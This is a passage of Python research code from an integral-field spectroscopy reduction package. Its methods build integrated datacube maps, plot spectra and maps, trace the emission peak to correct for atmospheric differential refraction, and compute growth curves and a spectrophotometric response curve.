# if l == 0 : print self.data.shape,x,"->",np.int(np.round(x+self.ADR_x[i]/self.pixel_size_arcsec))," ",y,"->",np.int(np.round(y+self.ADR_y[i]/self.pixel_size_arcsec))," bad data !"
# Check values tracing ADR data ...
self.trace_peak(ADR=True, plot=plot)
# SAVE DATA !!!!
# In prep...
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def get_integrated_map_and_plot(
self, min_wave=[0], max_wave=[0], plot=True, fcal=False
): # CHECK
"""
Integrated map and plot
Parameters
----------
min_wave
max_wave
plot
fcal
Returns
-------
"""
# Integrated map between good wavelengths
if min_wave == [0]:
min_wave = self.valid_wave_min
if max_wave == [0]:
max_wave = self.valid_wave_max
self.integrated_map_all = np.nansum(self.data, axis=0)
self.integrated_map = np.nansum(
self.data[
np.searchsorted(self.wavelength, min_wave): np.searchsorted(
self.wavelength, max_wave
)
],
axis=0,
)
# Search for peak of emission in integrated map and compute offsets from centre
self.max_y, self.max_x = np.unravel_index(
self.integrated_map.argmax(), self.integrated_map.shape
)
self.spaxel_RA0 = np.int(self.n_cols/2) + 1 # Using np.int for readability
self.spaxel_DEC0 = np.int(self.n_rows/2) + 1 # Using np.int for readability
self.offset_from_center_x_arcsec_integrated = (
self.max_x - self.spaxel_RA0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
self.offset_from_center_y_arcsec_integrated = (
self.max_y - self.spaxel_DEC0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
if plot:
self.plot_spectrum_integrated_cube(fcal=fcal)
self.plot_spectrum_cube(self.max_y, self.max_x, fcal=fcal)
print("\n> Created integrated map between {:5.2f} and {:5.2f}.".format(
min_wave, max_wave
))
print(" The peak of the emission in integrated image is in spaxel [ {} , {} ]".format(self.max_x, self.max_y))
print(" The peak of the emission tracing all wavelengths is in spaxel [ {} , {} ]".format(
np.round(self.x_peak_median, 2), np.round(self.y_peak_median, 2)))
self.offset_from_center_x_arcsec_tracing = (
self.x_peak_median - self.spaxel_RA0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
self.offset_from_center_y_arcsec_tracing = (
self.y_peak_median - self.spaxel_DEC0 + 1
) * self.pixel_size_arcsec # Offset from center using INTEGRATED map
if plot:
self.plot_map(
norm=colors.Normalize(),
spaxel=[self.max_x, self.max_y],
spaxel2=[self.x_peak_median, self.y_peak_median],
fcal=fcal,
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def add_spectrum(self, intensity, offset_rows, offset_cols, warnings=False):
"""
Add one single spectrum to the datacube
Parameters
----------
intensity: np.array(float)
Spectrum.
offset_rows, offset_cols: float
Offset with respect to the image centre, in pixels.
kernel_FWHM_pixels: float
FWHM of the interpolating kernel, in pixels
"""
kernel_centre_x = 0.5 * self.n_cols + offset_cols
x_min = int(kernel_centre_x - self.kernel_size_pixels)
x_max = int(kernel_centre_x + self.kernel_size_pixels) + 1
n_points_x = x_max - x_min
x = (
(np.linspace(x_min - kernel_centre_x, x_max - kernel_centre_x, n_points_x)/self.kernel_size_pixels)
)
x[0] = -1.0
x[-1] = 1.0
weight_x = np.diff(((3.0 * x - x ** 3 + 2.0)/4))
kernel_centre_y = 0.5 * self.n_rows + offset_rows
y_min = int(kernel_centre_y - self.kernel_size_pixels)
y_max = int(kernel_centre_y + self.kernel_size_pixels) + 1
n_points_y = y_max - y_min
y = (
(np.linspace(y_min - kernel_centre_y, y_max - kernel_centre_y, n_points_y)/self.kernel_size_pixels)
)
y[0] = -1.0
y[-1] = 1.0
weight_y = np.diff(((3.0 * y - y ** 3 + 2.0)/4))
if x_min < 0 or x_max >= self.n_cols or y_min < 0 or y_max >= self.n_rows:
if warnings:
print("**** WARNING **** : Spectra outside field of view: {} {} {}".format(x_min, kernel_centre_x, x_max))
print(" : {} {} {}".format(y_min, kernel_centre_y, y_max))
else:
bad_wavelengths = np.argwhere(np.isnan(intensity))
intensity[bad_wavelengths] = 0.0
ones = np.ones_like(intensity)
ones[bad_wavelengths] = 0.0
self._weighted_I[:, y_min: y_max - 1, x_min: x_max - 1] += (
intensity[:, np.newaxis, np.newaxis]
* weight_y[np.newaxis, :, np.newaxis]
* weight_x[np.newaxis, np.newaxis, :]
)
self._weight[:, y_min: y_max - 1, x_min: x_max - 1] += (
ones[:, np.newaxis, np.newaxis]
* weight_y[np.newaxis, :, np.newaxis]
* weight_x[np.newaxis, np.newaxis, :]
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectrum_cube(
self,
x,
y,
lmin=0,
lmax=0,
fmin=1e-30,
fmax=1e30,
fcal=False,
fig_size=10.0,
fig_size_y=0.0,
save_file="",
title="",
z=0.0,
): # Angel added 8 Sep
"""
Plot spectrum of a particular spaxel.
Parameters
----------
x, y:
coordenates of spaxel to show spectrum.
fcal:
Use flux calibration, default fcal=False.\n
If fcal=True, cube.flux_calibration is used.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> cube.plot_spectrum_cube(20, 20, fcal=True)
"""
if np.isscalar(x):
if fcal == False:
spectrum = self.data[:, x, y]
ylabel = "Flux [relative units]"
else:
spectrum = self.data[:, x, y] * 1e16 # /self.flux_calibration / 1E16
# ylabel="Flux [ 10$^{-16}$ * erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
ylabel = "Flux [ 10$^{-16}$ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
else:
print(" Adding spaxel 1 = [ {} , {} ]".format(x[0], y[0]))
spectrum = self.data[:, x[0], y[0]]
for i in range(len(x) - 1):
spectrum = spectrum + self.data[:, x[i + 1], y[i + 1]]
print(" Adding spaxel {} = [ {} , {}]".format(i + 2, x[i + 1],[i + 1]))
ylabel = "Flux [relative units]"
if fcal:
spectrum = (spectrum/self.flux_calibration)/1e16
ylabel = "Flux [ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Set limits
if fmin == 1e-30:
fmin = np.nanmin(spectrum)
if fmax == 1e30:
fmax = np.nanmax(spectrum)
if lmin == 0:
lmin = self.wavelength[0]
if lmax == 0:
lmax = self.wavelength[-1]
if fig_size_y == 0.0:
fig_size_y = fig_size / 3.0
plt.figure(figsize=(fig_size, fig_size_y))
plt.plot(self.wavelength, spectrum)
plt.minorticks_on()
plt.ylim(fmin, fmax)
plt.xlim(lmin, lmax)
if title == "":
title = "Spaxel ({} , {}) in {}".format(x, y, self.description)
plt.title(title)
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel(ylabel)
# Identify lines
if z != 0:
elines = [
3727.00,
3868.75,
3967.46,
3889.05,
4026.0,
4068.10,
4101.2,
4340.47,
4363.21,
4471.48,
4658.10,
4686.0,
4711.37,
4740.16,
4861.33,
4958.91,
5006.84,
5197.82,
6300.30,
6312.10,
6363.78,
6548.03,
6562.82,
6583.41,
6678.15,
6716.47,
6730.85,
7065.28,
7135.78,
7281.35,
7320,
7330,
]
# elines=[3727.00, 3868.75, 3967.46, 3889.05, 4026., 4068.10, 4101.2, 4340.47, 4363.21, 4471.48, 4658.10, 4861.33, 4958.91, 5006.84, 5197.82, 6300.30, 6312.10, 6363.78, 6548.03, 6562.82, 6583.41, 6678.15, 6716.47, 6730.85, 7065.28, 7135.78, 7320, 7330 ]
for i in elines:
plt.plot([i * (1 + z), i * (1 + z)], [fmin, fmax], "g:", alpha=0.95)
alines = [3934.777, 3969.588, 4308, 5175] # ,4305.61, 5176.7] # POX 4
# alines=[3934.777,3969.588,4308,5170] #,4305.61, 5176.7]
for i in alines:
plt.plot([i * (1 + z), i * (1 + z)], [fmin, fmax], "r:", alpha=0.95)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
#plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectrum_integrated_cube(
self,
lmin=0,
lmax=0,
fmin=1e-30,
fmax=1e30,
fcal=False,
fig_size=10,
save_file="",
): # Angel added 8 Sep
"""
Plot integrated spectrum
Parameters
----------
fcal:
Use flux calibration, default fcal=False.\n
If fcal=True, cube.flux_calibration is used.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> cube.plot_spectrum_cube(20, 20, fcal=True)
"""
spectrum = np.nansum(np.nansum(self.data, axis=1), axis=1)
if fcal == False:
ylabel = "Flux [relative units]"
else:
spectrum = spectrum * 1e16
# ylabel="Flux [ 10$^{-16}$ * erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
ylabel = "Flux [ 10$^{-16}$ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Set limits
if fmin == 1e-30:
fmin = np.nanmin(spectrum)
if fmax == 1e30:
fmax = np.nanmax(spectrum)
if lmin == 0:
lmin = self.wavelength[0]
if lmax == 0:
lmax = self.wavelength[-1]
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, spectrum)
plt.minorticks_on()
plt.ylim(fmin, fmax)
plt.xlim(lmin, lmax)
title = "Integrated spectrum in {}".format(self.description)
plt.title(title)
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel(ylabel)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
#plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_weight(
self, norm=colors.Normalize(), cmap="gist_gray", fig_size=10, save_file=""
):
"""
Plot weitgh map."
Example
----------
>>> cube1s.plot_weight()
"""
interpolated_map = np.mean(self._weight, axis=0)
self.plot_map(
interpolated_map,
norm=norm,
fig_size=fig_size,
cmap=cmap,
save_file=save_file,
description=self.description + " - Weight map",
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_wavelength(
self,
wavelength,
w2=0.0,
cmap=fuego_color_map,
fig_size=10,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
save_file="",
fcal=False,
):
"""
Plot map at a particular wavelength or in a wavelength range
Parameters
----------
wavelength: float
wavelength to be mapped.
norm:
Colour scale, default = colors.PowerNorm(gamma=1./4.)
Normalization scale
Lineal scale: norm=colors.Normalize().
Log scale:norm=colors.LogNorm()
cmap:
Color map used, default cmap=fuego_color_map
Velocities: cmap="seismic"
save_file:
(Optional) Save plot in file "file.extension"
"""
if w2 == 0.0:
interpolated_map = self.data[np.searchsorted(self.wavelength, wavelength)]
description = "{} - {} $\AA$".format(self.description, wavelength)
else:
interpolated_map = np.nansum(
self.data[
np.searchsorted(self.wavelength, wavelength): np.searchsorted(
self.wavelength, w2
)
],
axis=0,
)
description = "{} - Integrating [{}-{}] $\AA$".format(
self.description, wavelength, w2
)
self.plot_map(
mapa=interpolated_map,
norm=norm,
fig_size=fig_size,
cmap=cmap,
save_file=save_file,
description=description,
fcal=fcal,
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_map(
self,
mapa="",
norm=colors.Normalize(),
cmap="fuego",
fig_size=10,
fcal=False,
save_file="",
description="",
contours=True,
clabel=False,
spaxel=0,
spaxel2=0,
spaxel3=0,
):
"""
Show a given map.
Parameters
----------
map: np.array(float)
Map to be plotted. If not given, it plots the integrated map.
norm:
Normalization scale, default is lineal scale.
Lineal scale: norm=colors.Normalize().
Log scale: norm=colors.LogNorm()
Power law: norm=colors.PowerNorm(gamma=1./4.)
cmap: (default cmap="fuego").
Color map used.
Weight: cmap = "gist_gray"
Velocities: cmap="seismic".
Try also "inferno",
spaxel,spaxel2,spaxel3:
[x,y] positions of spaxels to show with a green circle, blue square and red triangle
"""
if description == "":
description = self.description
if mapa == "":
mapa = self.integrated_map
description = description + " - Integrated Map"
fig, ax = plt.subplots(figsize=(fig_size, fig_size))
cax = ax.imshow(
mapa,
origin="lower",
interpolation="none",
norm=norm,
cmap=cmap,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
+0.5 * self.n_rows * self.pixel_size_arcsec,
),
)
if contours:
CS = plt.contour(
mapa,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
+0.5 * self.n_rows * self.pixel_size_arcsec,
),
)
if clabel:
plt.clabel(CS, inline=1, fontsize=10)
ax.set_title(description, fontsize=14)
plt.tick_params(labelsize=12)
plt.xlabel("$\Delta$ RA [arcsec]", fontsize=12)
plt.ylabel("$\Delta$ DEC [arcsec]", fontsize=12)
plt.legend(loc="upper right", frameon=False)
plt.minorticks_on()
plt.grid(which="both", color="white")
# plt.gca().invert_xaxis() #MAMA
if spaxel != 0:
print(" The center of the cube is in spaxel [ {} , {} ]".format(self.spaxel_RA0, self.spaxel_DEC0))
plt.plot([0], [0], "+", ms=13, color="black", mew=4)
plt.plot([0], [0], "+", ms=10, color="white", mew=2)
offset_from_center_x_arcsec = (
spaxel[0] - self.spaxel_RA0 + 1.5
) * self.pixel_size_arcsec
offset_from_center_y_arcsec = (
spaxel[1] - self.spaxel_DEC0 + 1.5
) * self.pixel_size_arcsec
print(" - Green circle: {}, Offset from center [arcsec] : {} {}".format(spaxel, offset_from_center_x_arcsec, offset_from_center_y_arcsec))
plt.plot(
[offset_from_center_x_arcsec],
[offset_from_center_y_arcsec],
"o",
color="green",
ms=7,
)
if spaxel2 != 0:
offset_from_center_x_arcsec = (
spaxel2[0] - self.spaxel_RA0 + 1.5
) * self.pixel_size_arcsec
offset_from_center_y_arcsec = (
spaxel2[1] - self.spaxel_DEC0 + 1.5
) * self.pixel_size_arcsec
print(" - Blue square: {} , Offset from center [arcsec] : {} , {}".format(np.round(spaxel2, 2), np.round(offset_from_center_x_arcsec, 3), np.round(offset_from_center_y_arcsec, 3)))
plt.plot(
[offset_from_center_x_arcsec],
[offset_from_center_y_arcsec],
"s",
color="blue",
ms=7,
)
if spaxel3 != 0:
offset_from_center_x_arcsec = (
spaxel3[0] - self.spaxel_RA0 + 1.5
) * self.pixel_size_arcsec
offset_from_center_y_arcsec = (
spaxel3[1] - self.spaxel_DEC0 + 1.5
) * self.pixel_size_arcsec
print(" - Red triangle: {} , Offset from center [arcsec] : {} , {}".format(np.round(spaxel3, 2), np.round(offset_from_center_x_arcsec, 3), np.round(offset_from_center_y_arcsec, 3)))
plt.plot(
[offset_from_center_x_arcsec],
[offset_from_center_y_arcsec],
"v",
color="red",
ms=7,
)
cbar = fig.colorbar(cax, fraction=0.0457, pad=0.04)
if fcal:
barlabel = "{}".format("Integrated Flux [erg s$^{-1}$ cm$^{-2}$]")
else:
barlabel = "{}".format("Integrated Flux [Arbitrary units]")
cbar.set_label(barlabel, rotation=270, labelpad=20, fontsize=14)
# cbar.ax.set_yticklabels(['< -1', '0', '> 1'])# vertically oriented colorbar
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def create_map(self, wavelength1, wavelength2, name="NEW_MAP"):
"""
Create map adding maps in a wavelength range."
Parameters
----------
wavelength1, wavelength2: floats
The map will integrate all flux in the range [wavelength1, wavelength2].
map_name: string
String with the name of the map, must be the same than file created here.
Example
-------
>>> a = cube.create_map(6810,6830, "a")
> Created map with name a integrating range [ 6810 , 6830 ]
"""
mapa = np.nansum(
self.data[
np.searchsorted(self.wavelength, wavelength1): np.searchsorted(
self.wavelength, wavelength2
)
],
axis=0,
)
print("\n> Created map with name {} integrating range [ {} , {} ]".format(name, wavelength1, wavelength2))
print(" Data shape {}".format(np.shape(self.data)))
print(" Int map shape {}".format(np.shape(mapa)))
return mapa
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def trace_peak(
self, edgelow=10, edgehigh=10, plot=False, ADR=False, smoothfactor=2
): # TASK_trace_peak
"""
Parameters
----------
edgelow
edgehigh
plot
ADR
smoothfactor
Returns
-------
"""
print("\n\n> Tracing intensity peak over all wavelengths...")
x = np.arange(self.n_cols)
y = np.arange(self.n_rows)
if ADR:
print(" Checking ADR correction (small jumps are due to pixel size) ...")
tmp = copy.deepcopy(self.data_ADR)
tmp_img = np.nanmedian(tmp, axis=0)
sort = np.sort(tmp_img.ravel())
low_ind = np.where(tmp_img < sort[int(0.8 * len(sort))])
for i in np.arange(len(low_ind[0])):
tmp[:, low_ind[0][i], low_ind[1][i]] = np.nan
weight = np.nan_to_num(tmp) # self.data_ADR)
smoothfactor = 10
else:
tmp = copy.deepcopy(self.data)
tmp_img = np.nanmedian(tmp, axis=0)
sort = np.sort(tmp_img.ravel())
low_ind = np.where(tmp_img < sort[int(0.9 * len(sort))])
# print(low_ind.shape)
for i in np.arange(len(low_ind[0])):
tmp[:, low_ind[0][i], low_ind[1][i]] = np.nan
weight = np.nan_to_num(tmp) # self.data)
# try to median smooth image for better results?
# weight=sig.medfilt(weight,kernel_size=[51,1,1])
# also threshold the image so only the top 80% are used
mean_image = np.nanmean(weight, axis=0)
mean_image /= np.nanmean(mean_image)
weight *= mean_image[np.newaxis, :, :]
xw = x[np.newaxis, np.newaxis, :] * weight
yw = y[np.newaxis, :, np.newaxis] * weight
w = np.nansum(weight, axis=(1, 2))
self.x_peak = np.nansum(xw, axis=(1, 2))/w
self.y_peak = np.nansum(yw, axis=(1, 2))/w
self.x_peak_median = np.nanmedian(self.x_peak)
self.y_peak_median = np.nanmedian(self.y_peak)
self.x_peak_median_index = np.nanargmin(
np.abs(self.x_peak - self.x_peak_median)
)
self.y_peak_median_index = np.nanargmin(
np.abs(self.y_peak - self.y_peak_median)
)
wl = self.wavelength
x = (
self.x_peak - self.x_peak[self.x_peak_median_index]
) * self.pixel_size_arcsec
y = (
self.y_peak - self.y_peak[self.y_peak_median_index]
) * self.pixel_size_arcsec
odd_number = (
smoothfactor * int((np.sqrt(self.n_wave)/2)) + 1
) # Originarily, smoothfactor = 2
print(" Using medfilt window = {}".format(odd_number))
# fit, trimming edges
index = np.arange(len(x))
valid_ind = np.where(
(index >= edgelow)
& (index <= len(wl) - edgehigh)
& (~np.isnan(x))
& (~np.isnan(y))
)[0]
valid_wl = wl[valid_ind]
valid_x = x[valid_ind]
wlm = sig.medfilt(valid_wl, odd_number)
wx = sig.medfilt(valid_x, odd_number)
# iteratively clip and refit for WX
maxit = 10
niter = 0
stop = 0
fit_len = 100 # -100
while stop < 1:
# print ' Trying iteration ', niter,"..."
# a2x,a1x,a0x = np.polyfit(wlm, wx, 2)
fit_len_init = copy.deepcopy(fit_len)
if niter == 0:
fit_index = np.where(wx == wx)
fit_len = len(fit_index)
sigma_resid = 0.0
if niter > 0:
sigma_resid = median_absolute_deviation(resid)
fit_index = np.where(np.abs(resid) < 4 * sigma_resid)[0]
fit_len = len(fit_index)
try:
p = np.polyfit(wlm[fit_index], wx[fit_index], 2)
pp = np.poly1d(p)
fx = pp(wl)
fxm = pp(wlm)
resid = wx - fxm
# print " Iteration {:2} results in RA: sigma_residual = {:.6f}, fit_len = {:5} fit_len ={:5}".format(niter,sigma_resid,fit_len_init,fit_len)
except Exception:
print(" Skipping iteration {}".format(niter))
if (niter >= maxit) or (fit_len_init == fit_len):
if niter >= maxit:
print(" x: Max iterations, {:2}, reached!")
if fit_len_init == fit_len:
print(" x: All interval fitted in iteration {:2} ! ".format(niter))
stop = 2
niter = niter + 1
# valid_y = y[edgelow:len(wl)-edgehigh]
valid_ind = np.where(
(index >= edgelow)
& (index <= len(wl) - edgehigh)
& (~np.isnan(x))
& (~np.isnan(y))
)[0]
valid_y = y[valid_ind]
wy = sig.medfilt(valid_y, odd_number)
# iteratively clip and refit for WY
maxit = 10
niter = 0
stop = 0
fit_len = -100
while stop < 1:
fit_len_init = copy.deepcopy(fit_len)
if niter == 0:
fit_index = np.where(wy == wy)
fit_len = len(fit_index)
sigma_resid = 0.0
if niter > 0:
sigma_resid = median_absolute_deviation(resid)
fit_index = np.where(np.abs(resid) < 4 * sigma_resid)[0]
fit_len = len(fit_index)
try:
p = np.polyfit(wlm[fit_index], wy[fit_index], 2)
pp = np.poly1d(p)
fy = pp(wl)
fym = pp(wlm)
resid = wy - fym
# print " Iteration {:2} results in DEC: sigma_residual = {:.6f}, fit_len = {:5} fit_len ={:5}".format(niter,sigma_resid,fit_len_init,fit_len)
except Exception:
print(" Skipping iteration {}".format(niter))
if (niter >= maxit) or (fit_len_init == fit_len):
if niter >= maxit:
print(" y: Max iterations, {:2}, reached!")
if fit_len_init == fit_len:
print(" y: All interval fitted in iteration {:2} ! ".format(niter))
stop = 2
niter = niter + 1
self.ADR_x = fx
self.ADR_y = fy
self.ADR_x_max = np.nanmax(self.ADR_x) - np.nanmin(self.ADR_x)
self.ADR_y_max = np.nanmax(self.ADR_y) - np.nanmin(self.ADR_y)
ADR_xy = np.sqrt(self.ADR_x ** 2 + self.ADR_y ** 2)
self.ADR_total = np.nanmax(ADR_xy) - np.nanmin(ADR_xy)
if plot:
plt.figure(figsize=(10, 5))
plt.plot(wl, fx, "-g", linewidth=3.5)
plt.plot(wl, fy, "-g", linewidth=3.5)
plt.plot(wl, x, "k.", alpha=0.2)
plt.plot(wl, y, "r.", alpha=0.2)
plt.plot(wl, sig.medfilt(x, odd_number), "k-")
plt.plot(wl, sig.medfilt(y, odd_number), "r-")
hi = np.max([np.nanpercentile(x, 95), np.nanpercentile(y, 95)])
lo = np.min([np.nanpercentile(x, 5), np.nanpercentile(y, 5)])
plt.ylim(lo, hi)
plt.ylabel("$\Delta$ offset [arcsec]")
plt.xlabel("Wavelength [$\AA$]")
plt.title(self.description)
# plt.show()
# plt.close()
print("> Peak coordinates tracing all wavelengths found in spaxel: ({:.2f}, {:.2f})".format(
self.x_peak_median, self.y_peak_median
))
print(" Effect of the ADR : {:.2f} in RA (black), {:.2f} in DEC (red), TOTAL = +/- {:.2f} arcsec".format(
self.ADR_x_max, self.ADR_y_max, self.ADR_total
))
# Check numbers using SMOOTH data
ADR_x_max = np.nanmax(fxm) - np.nanmin(fxm)
ADR_y_max = np.nanmax(fym) - np.nanmin(fym)
ADR_xy = np.sqrt(fxm ** 2 + fym ** 2)
ADR_total = np.nanmax(ADR_xy) - np.nanmin(ADR_xy)
print(" Using SMOOTH values: ")
print(" Effect of the ADR : {:.2f} in RA (black), {:.2f} in DEC (red), TOTAL = +/- {:.2f} arcsec".format(
ADR_x_max, ADR_y_max, ADR_total
))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def growth_curve_between(self, min_wave=0, max_wave=0, plot=False, verbose=False):
"""
Compute growth curve in a wavelength range.
Returns r2_growth_curve, F_growth_curve, flux, r2_half_light
Parameters
----------
min_wave, max_wave: floats
wavelength range = [min_wave, max_wave].
plot: boolean
Plot yes/no
Example
-------
>>>r2_growth_curve, F_growth_curve, flux, r2_half_light = self.growth_curve_between(min_wave, max_wave, plot=True) # 0,1E30 ??
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
if verbose:
print(" - Calculating growth curve between {} {} :".format(min_wave, max_wave))
index_min = np.searchsorted(self.wavelength, min_wave)
index_max = np.searchsorted(self.wavelength, max_wave)
intensity = np.nanmean(self.data[index_min:index_max, :, :], axis=0)
x_peak = np.median(self.x_peak[index_min:index_max])
y_peak = np.median(self.y_peak[index_min:index_max])
x = np.arange(self.n_cols) - x_peak
y = np.arange(self.n_rows) - y_peak
r2 = np.sum(np.meshgrid(x ** 2, y ** 2), axis=0)
sorted_by_distance = np.argsort(r2, axis=None)
F_growth_curve = []
r2_growth_curve = []
total_flux = 0.0
for spaxel in sorted_by_distance:
index = np.unravel_index(spaxel, (self.n_rows, self.n_cols))
I = intensity[index]
# print spaxel, r2[index], L, total_flux, np.isnan(L)
# if np.isnan(L) == False and L > 0:
if np.isnan(I) == False:
total_flux += I # TODO: Properly account for solid angle...
F_growth_curve.append(total_flux)
r2_growth_curve.append(r2[index])
F_guess = np.max(F_growth_curve)
r2_half_light = np.interp(0.5 * F_guess, F_growth_curve, r2_growth_curve)
self.seeing = np.sqrt(r2_half_light) * self.pixel_size_arcsec
if plot:
r_norm = np.sqrt(np.array(r2_growth_curve)/r2_half_light)
F_norm = np.array(F_growth_curve)/F_guess
print(" Flux guess = {} {} ratio = {}".format(F_guess, np.nansum(intensity), np.nansum(intensity)/F_guess))
print(" Half-light radius: {} arcsec = seeing if object is a star ".format(self.seeing))
print(" Light within 2, 3, 4, 5 half-light radii: {}".format(np.interp([2, 3, 4, 5], r_norm, F_norm)))
plt.figure(figsize=(10, 8))
plt.plot(r_norm, F_norm, "-")
plt.title(
"Growth curve between {} and {} in {}".format(min_wave, max_wave, self.object))
plt.xlabel("Radius [arcsec]")
plt.ylabel("Flux")
plt.axvline(x=self.seeing, color="g", alpha=0.7)
plt.axhline(y=0.5, color="k", linestyle=":", alpha=0.5)
plt.axvline(x=2 * self.seeing, color="k", linestyle=":", alpha=0.2)
plt.axvline(x=3 * self.seeing, color="k", linestyle=":", alpha=0.2)
plt.axvline(x=4 * self.seeing, color="k", linestyle=":", alpha=0.2)
plt.axvline(x=5 * self.seeing, color="r", linestyle="--", alpha=0.2)
# plt.axhline(y=np.interp([2, 3, 4], r_norm, F_norm), color='k', linestyle=':', alpha=0.2)
plt.axhline(
y=np.interp([6], r_norm, F_norm), color="r", linestyle="--", alpha=0.2
)
plt.minorticks_on()
# plt.show()
# plt.close()
return r2_growth_curve, F_growth_curve, F_guess, r2_half_light
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def half_light_spectrum(
self, r_max=1, plot=False, smooth=21, min_wave=0, max_wave=0
):
"""
Compute half light spectrum (for r_max=1) or integrated star spectrum (for r_max=5) in a wavelength range.
Parameters
----------
r_max = 1: float
r_max to integrate, in units of r2_half_light (= seeing if object is a star, for flux calibration make r_max=5)
min_wave, max_wave: floats
wavelength range = [min_wave, max_wave]
smooth = 21: float
smooth the data
plot: boolean
Plot yes/no
Example
-------
>>> self.half_light_spectrum(5, plot=plot, min_wave=min_wave, max_wave=max_wave)
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
(
r2_growth_curve,
F_growth_curve,
flux,
r2_half_light,
) = self.growth_curve_between(
min_wave, max_wave, plot=True, verbose=True
) # 0,1E30 ??
# print "\n> Computing growth-curve spectrum..."
intensity = []
smooth_x = sig.medfilt(self.x_peak, smooth) # originally, smooth = 11
smooth_y = sig.medfilt(self.y_peak, smooth)
edgelow = (np.abs(self.wavelength - min_wave)).argmin()
edgehigh = (np.abs(self.wavelength - max_wave)).argmin()
valid_wl = self.wavelength[edgelow:edgehigh]
for l in range(self.n_wave): # self.n_wave
# wavelength = self.wavelength[l]
# if l % (self.n_wave/10+1) == 0:
# print " {:.2f} Angstroms (wavelength {}/{})..." \
# .format(wavelength, l+1, self.n_wave)
x = np.arange(self.n_cols) - smooth_x[l]
y = np.arange(self.n_rows) - smooth_y[l]
r2 = np.sum(np.meshgrid(x ** 2, y ** 2), axis=0)
spaxels = np.where(r2 < r2_half_light * r_max ** 2)
intensity.append(np.nansum(self.data[l][spaxels]))
valid_intensity = intensity[edgelow:edgehigh]
valid_wl_smooth = sig.medfilt(valid_wl, smooth)
valid_intensity_smooth = sig.medfilt(valid_intensity, smooth)
if plot:
fig_size = 12
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, intensity, "b", alpha=1, label="Intensity")
plt.plot(
valid_wl_smooth,
valid_intensity_smooth,
"r-",
alpha=0.5,
label="Smooth = " + "{}".format(smooth),
)
margen = 0.1 * (np.nanmax(intensity) - np.nanmin(intensity))
plt.ylim(np.nanmin(intensity) - margen, np.nanmax(intensity) + margen)
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.title("Integrated spectrum of {} for r_half_light = {}".format(self.object, r_max))
plt.axvline(x=min_wave, color="k", linestyle="--", alpha=0.5)
plt.axvline(x=max_wave, color="k", linestyle="--", alpha=0.5)
plt.minorticks_on()
plt.legend(frameon=False, loc=1)
# plt.show()
# plt.close()
if r_max == 5:
print(" Saving this integrated star flux in self.integrated_star_flux")
self.integrated_star_flux = np.array(intensity)
return np.array(intensity)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def do_response_curve(
self,
filename,
min_wave=0,
max_wave=0,
step=25.0,
fit_degree=3,
exp_time=60,
smooth=0.03,
ha_width=0,
plot=True,
verbose=False,
): # smooth new 5 Mar, smooth=21, now we don't use it
"""
Compute the response curve of a spectrophotometric star.
Parameters
----------
filename: string
filename where the spectrophotometric data are included (e.g. ffeige56.dat)
min_wave, max_wave: floats
wavelength range = [min_wave, max_wave] where the fit is performed
step = 25: float
Step (in A) for smoothing the data
fit_degree = 3: integer
degree of the polynomium used for the fit (3, 5, or 7).
If fit_degree = 0 it interpolates the data
exp_time = 60: float
Exposition time of the calibration star
smooth = 0.03: float
Smooth value for interpolating the data for fit_degree = 0.
plot: boolean
Plot yes/no
Example
-------
>>> babbsdsad
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
print("\n> Computing response curve for {} using step= {}, in range [ {} , {} ]".format(self.object, step, min_wave, max_wave))
# flux_cal_read in units of ergs/cm/cm/s/A * 10**16
# lambda_cal_read, flux_cal_read, delta_lambda_read = np.loadtxt(filename, usecols=(0,1,3), unpack=True)
lambda_cal_read, flux_cal_read = np.loadtxt(
filename, usecols=(0, 1), unpack=True
)
valid_wl_smooth = np.arange(lambda_cal_read[0], lambda_cal_read[-1], step)
tck_star = interpolate.splrep(lambda_cal_read, flux_cal_read, s=0)
